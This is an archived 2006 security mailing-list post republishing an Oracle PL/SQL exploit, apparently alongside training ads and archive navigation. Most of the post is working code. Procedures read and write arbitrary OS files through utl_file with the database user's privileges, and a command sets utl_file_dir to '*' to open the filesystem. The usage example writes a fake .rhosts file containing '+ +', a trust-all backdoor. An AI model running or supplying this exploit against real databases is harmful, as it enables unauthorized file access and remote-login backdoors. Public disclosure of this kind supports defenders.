Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[EXPL] Oracle File System Access via utl_file (Exploit)

from [SecuriTeam] Network Security [Permanent Link]
Subject: [EXPL] Oracle File System Access via utl_file (Exploit)
Date: 20 Dec 2006 08:53:55 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Oracle File System Access via utl_file (Exploit)
------------------------------------------------------------------------


SUMMARY

This exploit is an example file system access suite for Oracle based on 
the  <http://www.adp-gmbh.ch/ora/plsql/utl_file.html> utl_file package. 
Use it to remotely read/write OS files with the privileges of the RDBMS 
user, without the need for any special privileges (CONNECT and RESOURCE 
roles are more than enough).

DETAILS

Exploit:
--
-- $Id: raptor_orafile.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $
--
-- raptor_orafile.sql - file system access suite for oracle
-- Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
--
-- This is an example file system access suite for Oracle based on the 
utl_file
-- package (http://www.adp-gmbh.ch/ora/plsql/utl_file.html). Use it to 
remotely
-- read/write OS files with the privileges of the RDBMS user, without the 
need
-- for any special privileges (CONNECT and RESOURCE roles are more than 
enough).
--
-- The database _must_ be configured with a non-NULL utl_file_dir value
-- (preferably '*'). Check it using the following query:
-- SQL> select name, value from v$parameter where name = 'utl_file_dir';
--
-- If you have the required privileges (ALTER SYSTEM) and feel brave
-- enough to perform a DBMS shutdown/startup, you can consider modifying
-- this parameter yourself, using the following PL/SQL:
-- SQL> alter system set utl_file_dir='*' scope =spfile;
--
-- See also: http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql
--
-- Usage example:
-- $ sqlplus scott/tiger
-- [...]
-- SQL> @raptor_orafile.sql
-- [...]
-- SQL> exec utlwritefile('/tmp', 'mytest', '# this is a fake .rhosts 
file');
-- SQL> exec utlwritefile('/tmp', 'mytest', '+ +');
-- SQL> set serveroutput on;
-- SQL> exec utlreadfile('/tmp', 'mytest');
-- # this is a fake .rhosts file
-- + +
-- End of file.
--

-- file reading module
--
-- usage: set serveroutput on;
--        exec utlreadfile('/dir', 'file');
create or replace procedure utlreadfile(p_directory in varchar2, 
p_filename in varchar2) as
buffer varchar2(260);
fd utl_file.file_type;
begin
 fd := utl_file.fopen(p_directory, p_filename, 'r');
 dbms_output.enable(1000000);
 loop
  utl_file.get_line(fd, buffer, 254);
  dbms_output.put_line(buffer);
 end loop;
 exception when no_data_found then
  dbms_output.put_line('End of file.');
  if (utl_file.is_open(fd) = true) then
   utl_file.fclose(fd);
  end if;
 when others then
  if (utl_file.is_open(fd) = true) then
   utl_file.fclose(fd);
  end if;
end;
/

-- file writing module
--
-- usage: exec utlwritefile('/dir', 'file', 'line to append');
create or replace procedure utlwritefile(p_directory in varchar2, 
p_filename in varchar2, p_line in varchar2) as
fd utl_file.file_type;
begin
 fd := utl_file.fopen(p_directory, p_filename, 'a'); -- append
 utl_file.put_line(fd, p_line);
 if (utl_file.is_open(fd) = true) then
  utl_file.fclose(fd);
 end if;
end;
/

-- milw0rm.com [2006-12-19]


ADDITIONAL INFORMATION

The information has been provided by  <mailto:raptor@0xdeadbeef.info> 
Marco Ivaldi.
The original article can be found at:  
<http://www.milw0rm.com/exploits/2959> 
http://www.milw0rm.com/exploits/2959



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [EXPL] Oracle File System Access via utl_file (Exploit), SecuriTeam <=
Previous by Date:  [UNIX] OpenLDAP kbind Buffer Overflow (Exploit), SecuriTeam
Next by Date:  [EXPL] Oracle (extproc) Local/Remote Command Execution (Exploit), SecuriTeam
Previous by Thread:  [UNIX] OpenLDAP kbind Buffer Overflow (Exploit), SecuriTeam
Next by Thread:  [EXPL] Oracle (extproc) Local/Remote Command Execution (Exploit), SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]